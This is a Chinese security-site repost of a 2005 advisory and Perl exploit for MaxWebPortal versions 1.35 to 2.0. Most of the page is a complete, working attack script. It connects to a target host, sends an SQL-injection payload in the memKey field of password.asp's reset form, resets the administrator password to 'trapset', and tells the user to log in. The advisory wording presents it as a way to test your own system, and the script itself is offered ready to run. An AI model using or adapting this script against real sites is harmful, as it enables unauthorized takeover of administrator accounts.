首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MaxWebPortal Administrator Password Retrieval
来源:irsdl@yahoo.com 作者:s d 发布时间:2005-05-31  

MaxWebPortal Administrator Password Retrieval (Exploit)

Summary
MaxWebPortal is "a web portal and online community system which includes advanced features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. Easy-to-use and powerful user interface allows members to add news, content, write reviews and share information among other registered users".

A vulnerability in MaxWebPortal allows remote attackers to retrieve the password utilized by the administrator user. The following exploit can be used to test your system for the mentioned vulnerability.

Credit:
The information has been provided by s d.

Details
Vulnerable Systems:
* MaxWebPortal version 1.35
* MaxWebPortal version 1.36
* MaxWebPortal version 2.0

Exploit:
#!/usr/bin/perl
#################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
#################################
# EXPLOIT FOR - MAX Portal (All Versions)
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v );
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#
#Discovered by: s d <irsdl@yahoo.com>
#
#################################
# Gr33tz To => mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
#And Iranian Hacking & Security Teams :
# IHS , Shabgard , Emperor ,Crouz & Simorgh-ev
#################################
use IO::Socket;

if (@ARGV < 2)
{
print "\n=====================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set Underground Hacking Team \n\n";
print " Usage: Max.pl <T4rg3t> <V3rsion>\n\n";
print " V3rsion :\n";
print " 1 => Version 1.35 and 0lder\n";
print " 2 => Version 1.36, 2.0 and Next\n";
print "=====================\n\n";
print "Example:\n\n";
print " Max.pl www.Site.com 1\n";
exit();
}
$hell = "foo' or M_Name='admin";
if ($ARGV[1] =~"2" ){$hell = "foo%27%29+or+M_Name%3D%27admin%27". "+or+%28%271%27%3D%272"};


my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "POST /password.asp?mode=reset HTTP/1.0";
$http .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
$http .= "Accept-Language: fa\n";
$http .= "Content-Type: application/x-www-form-urlencoded\n";
$http .= "Pragma: no-cache\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n";
$http .= "Content-Length: 111\n";
$http .= "Proxy-Connection: Keep-Alive\n";
$http .= "Cookie: SSOComhide=Name=admin; SSOComUser=Cookies=&Pword=d7fae5da3d785535c12b70865519ba86". "&Name=admin\n\n";

$http .= "pass=trapset&pass2=trapset&memId=-1&memKey=$hell". "&Submit=Submit\n\n\n\n";

print "\n";
print $remote $http;
sleep(1);
print "[+] Attacking ...\n";
print "[+] Changing Admin's Password ...\n";
while (<$remote>)
{
}
print "\nNow Go to $host and Login With :\n\n";
print "User: admin\n";
print "Pass: trapset\n\n";
print "Enjoy ;)\n";
print "\n";
## EOF ##



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GLD Remote Format String Vulne
·Linux Cryptoloop Watermark Exp
·Multiple Vendor TCP Timestamps
·Exim Buffer Overflow Exploit
·Mozilla Suite and Firefox Scri
·Meteor FTP Server Buffer Overf
·Mozilla Firefox view-source:ja
·Zeroboard 4.x preg_replace Rem
·Mozilla Firefox view-source: P
·Microsoft Windows COM Structur
·MS SQL Server Passwords Brutef
·Ethereal <= 0.10.10 SIP Pro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved